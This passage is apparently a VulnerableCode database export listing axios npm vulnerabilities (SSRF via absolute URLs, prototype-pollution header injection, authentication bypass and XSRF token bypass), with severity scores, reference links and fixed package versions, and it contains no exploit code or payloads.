scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T15:02:50Z/

url

https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-62718

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	6.3
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-62718

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2456913
reference_id	2456913
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2456913

reference_url

https://github.com/advisories/GHSA-3p68-rc4w-qgx5

reference_id

GHSA-3p68-rc4w-qgx5

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-3p68-rc4w-qgx5

reference_url	https://access.redhat.com/errata/RHSA-2026:10175
reference_id	RHSA-2026:10175
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:10175

reference_url	https://access.redhat.com/errata/RHSA-2026:13571
reference_id	RHSA-2026:13571
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13571

reference_url	https://access.redhat.com/errata/RHSA-2026:13826
reference_id	RHSA-2026:13826
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:13826

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:19712
reference_id	RHSA-2026:19712
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19712

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

reference_url	https://access.redhat.com/errata/RHSA-2026:8483
reference_id	RHSA-2026:8483
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8483

reference_url	https://access.redhat.com/errata/RHSA-2026:8484
reference_id	RHSA-2026:8484
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8484

reference_url	https://access.redhat.com/errata/RHSA-2026:8490
reference_id	RHSA-2026:8490
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8490

reference_url	https://access.redhat.com/errata/RHSA-2026:8491
reference_id	RHSA-2026:8491
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8491

reference_url	https://access.redhat.com/errata/RHSA-2026:8493
reference_id	RHSA-2026:8493
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:8493

reference_url	https://access.redhat.com/errata/RHSA-2026:9742
reference_id	RHSA-2026:9742
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:9742

fixed_packages

url pkg:npm/axios@1.15.0

purl pkg:npm/axios@1.15.0

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4b7a-22xk-gbh9

vulnerability	VCID-5kg1-k416-dfc1

vulnerability	VCID-6ru1-uamj-5ud3

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-gp41-4j8d-37ce

vulnerability	VCID-hadc-5d2f-gqe6

vulnerability	VCID-jvs6-8bva-nqb3

vulnerability	VCID-rusx-pwdw-zqcj

vulnerability	VCID-vzqt-dj1z-bqa6

vulnerability	VCID-xdas-dhtb-nuge

vulnerability	VCID-xg1x-4spz-jucn

vulnerability	VCID-yu5y-e4bk-zyfp

vulnerability	VCID-z5pf-pqcd-ckas

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0

aliases CVE-2025-62718, GHSA-3p68-rc4w-qgx5

risk_score 3.1

exploitability 0.5

weighted_severity 6.3

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-td7u-cct6-bud6

url VCID-vq2d-yv43-57b6

vulnerability_id VCID-vq2d-yv43-57b6

summary

axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-27152

reference_id

reference_type

scores

value	0.00212
scoring_system	epss
scoring_elements	0.43838
published_at	2026-06-06T12:55:00Z

value	0.00212
scoring_system	epss
scoring_elements	0.43829
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-27152

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde

reference_url

https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f

reference_url

https://github.com/axios/axios/issues/6463

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/

url

https://github.com/axios/axios/issues/6463

reference_url

https://github.com/axios/axios/pull/6829

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios/pull/6829

reference_url

https://github.com/axios/axios/releases/tag/v1.8.2

reference_id

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios/releases/tag/v1.8.2

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223
reference_id	1102223
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2350618
reference_id	2350618
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2350618

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-27152

reference_id

CVE-2025-27152

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-27152

reference_url	https://github.com/advisories/GHSA-jr5f-v2jv-69x6
reference_id	GHSA-jr5f-v2jv-69x6
reference_type
scores
url	https://github.com/advisories/GHSA-jr5f-v2jv-69x6

reference_url

https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6

reference_id

GHSA-jr5f-v2jv-69x6

reference_type

scores

value	7.7
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/

url

https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6

fixed_packages

url pkg:npm/axios@1.8.2

purl pkg:npm/axios@1.8.2

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-37kj-pzyt-8be6

vulnerability	VCID-4b7a-22xk-gbh9

vulnerability	VCID-5kg1-k416-dfc1

vulnerability	VCID-6ru1-uamj-5ud3

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-axy8-kmka-pugw

vulnerability	VCID-gp41-4j8d-37ce

vulnerability	VCID-hadc-5d2f-gqe6

vulnerability	VCID-jvs6-8bva-nqb3

vulnerability	VCID-kwj2-mk8c-4fef

vulnerability	VCID-rusx-pwdw-zqcj

vulnerability	VCID-td7u-cct6-bud6

vulnerability	VCID-vzqt-dj1z-bqa6

vulnerability	VCID-xdas-dhtb-nuge

vulnerability	VCID-xg1x-4spz-jucn

vulnerability	VCID-yu5y-e4bk-zyfp

vulnerability	VCID-z5pf-pqcd-ckas

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.2

aliases CVE-2025-27152, GHSA-jr5f-v2jv-69x6

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vq2d-yv43-57b6

url VCID-vzqt-dj1z-bqa6

vulnerability_id VCID-vzqt-dj1z-bqa6

summary axios: Axios: Arbitrary HTTP header injection via prototype pollution

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42035.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42035

reference_id

reference_type

scores

value	0.00047
scoring_system	epss
scoring_elements	0.15195
published_at	2026-06-05T12:55:00Z

value	0.00047
scoring_system	epss
scoring_elements	0.15185
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42035

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42035

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:07:43Z/

url

https://github.com/axios/axios/security/advisories/GHSA-6chq-wfr3-2hj9

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42035

reference_id

reference_type

scores

value	7.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42035

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461606
reference_id	2461606
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461606

reference_url

https://github.com/advisories/GHSA-6chq-wfr3-2hj9

reference_id

GHSA-6chq-wfr3-2hj9

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-6chq-wfr3-2hj9

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:16476
reference_id	RHSA-2026:16476
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16476

reference_url	https://access.redhat.com/errata/RHSA-2026:16532
reference_id	RHSA-2026:16532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16532

reference_url	https://access.redhat.com/errata/RHSA-2026:16534
reference_id	RHSA-2026:16534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16534

reference_url	https://access.redhat.com/errata/RHSA-2026:16535
reference_id	RHSA-2026:16535
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16535

reference_url	https://access.redhat.com/errata/RHSA-2026:16542
reference_id	RHSA-2026:16542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16542

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17468
reference_id	RHSA-2026:17468
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17468

reference_url	https://access.redhat.com/errata/RHSA-2026:17474
reference_id	RHSA-2026:17474
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17474

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19109
reference_id	RHSA-2026:19109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19109

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:21338
reference_id	RHSA-2026:21338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21338

reference_url	https://access.redhat.com/errata/RHSA-2026:21772
reference_id	RHSA-2026:21772
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21772

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42035, GHSA-6chq-wfr3-2hj9

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-vzqt-dj1z-bqa6

url VCID-xdas-dhtb-nuge

vulnerability_id VCID-xdas-dhtb-nuge

summary axios: Axios: Authentication bypass due to prototype pollution of HTTP error handling

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json

reference_id

reference_type

scores

value	8.2
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42041.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42041

reference_id

reference_type

scores

value	0.00202
scoring_system	epss
scoring_elements	0.42235
published_at	2026-06-06T12:55:00Z

value	0.00202
scoring_system	epss
scoring_elements	0.42224
published_at	2026-06-05T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42041

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42041

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:29:47Z/

url

https://github.com/axios/axios/security/advisories/GHSA-w9j2-pvgh-6h63

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42041

reference_id

reference_type

scores

value	4.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42041

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461629
reference_id	2461629
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461629

reference_url

https://github.com/advisories/GHSA-w9j2-pvgh-6h63

reference_id

GHSA-w9j2-pvgh-6h63

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-w9j2-pvgh-6h63

reference_url	https://access.redhat.com/errata/RHSA-2026:14937
reference_id	RHSA-2026:14937
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:14937

reference_url	https://access.redhat.com/errata/RHSA-2026:16476
reference_id	RHSA-2026:16476
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16476

reference_url	https://access.redhat.com/errata/RHSA-2026:16532
reference_id	RHSA-2026:16532
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16532

reference_url	https://access.redhat.com/errata/RHSA-2026:16534
reference_id	RHSA-2026:16534
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16534

reference_url	https://access.redhat.com/errata/RHSA-2026:16535
reference_id	RHSA-2026:16535
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16535

reference_url	https://access.redhat.com/errata/RHSA-2026:16542
reference_id	RHSA-2026:16542
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16542

reference_url	https://access.redhat.com/errata/RHSA-2026:16874
reference_id	RHSA-2026:16874
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:16874

reference_url	https://access.redhat.com/errata/RHSA-2026:17468
reference_id	RHSA-2026:17468
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17468

reference_url	https://access.redhat.com/errata/RHSA-2026:17474
reference_id	RHSA-2026:17474
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17474

reference_url	https://access.redhat.com/errata/RHSA-2026:17657
reference_id	RHSA-2026:17657
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17657

reference_url	https://access.redhat.com/errata/RHSA-2026:17699
reference_id	RHSA-2026:17699
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:17699

reference_url	https://access.redhat.com/errata/RHSA-2026:19109
reference_id	RHSA-2026:19109
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19109

reference_url	https://access.redhat.com/errata/RHSA-2026:19375
reference_id	RHSA-2026:19375
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:19375

reference_url	https://access.redhat.com/errata/RHSA-2026:20889
reference_id	RHSA-2026:20889
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20889

reference_url	https://access.redhat.com/errata/RHSA-2026:20938
reference_id	RHSA-2026:20938
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:20938

reference_url	https://access.redhat.com/errata/RHSA-2026:21017
reference_id	RHSA-2026:21017
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21017

reference_url	https://access.redhat.com/errata/RHSA-2026:21338
reference_id	RHSA-2026:21338
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21338

reference_url	https://access.redhat.com/errata/RHSA-2026:21772
reference_id	RHSA-2026:21772
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:21772

reference_url	https://access.redhat.com/errata/RHSA-2026:22465
reference_id	RHSA-2026:22465
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22465

reference_url	https://access.redhat.com/errata/RHSA-2026:22619
reference_id	RHSA-2026:22619
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22619

reference_url	https://access.redhat.com/errata/RHSA-2026:22629
reference_id	RHSA-2026:22629
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22629

reference_url	https://access.redhat.com/errata/RHSA-2026:22840
reference_id	RHSA-2026:22840
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:22840

reference_url	https://access.redhat.com/errata/RHSA-2026:23361
reference_id	RHSA-2026:23361
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:23361

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42041, GHSA-w9j2-pvgh-6h63

risk_score 3.7

exploitability 0.5

weighted_severity 7.4

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-xdas-dhtb-nuge

url VCID-xg1x-4spz-jucn

vulnerability_id VCID-xg1x-4spz-jucn

summary axios: Axios: XSRF token bypass leading to information disclosure

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json

reference_id

reference_type

scores

value	6.1
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42042.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-42042

reference_id

reference_type

scores

value	0.00065
scoring_system	epss
scoring_elements	0.20417
published_at	2026-06-05T12:55:00Z

value	0.00065
scoring_system	epss
scoring_elements	0.20406
published_at	2026-06-06T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-42042

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42042

reference_url

https://github.com/axios/axios

reference_id

reference_type

scores

value	5.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/axios/axios

reference_url

https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c

reference_id

reference_type

scores

value	5.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:35:32Z/

url

https://github.com/axios/axios/security/advisories/GHSA-xx6v-rp6x-q39c

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-42042

reference_id

reference_type

scores

value	5.4
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-42042

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id	1134878
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2461637
reference_id	2461637
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2461637

reference_url

https://github.com/advisories/GHSA-xx6v-rp6x-q39c

reference_id

GHSA-xx6v-rp6x-q39c

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-xx6v-rp6x-q39c

fixed_packages

url pkg:npm/axios@1.15.1

purl pkg:npm/axios@1.15.1

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-8a5f-cd5t-mucc

vulnerability	VCID-rusx-pwdw-zqcj

resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1

aliases CVE-2026-42042, GHSA-xx6v-rp6x-q39c

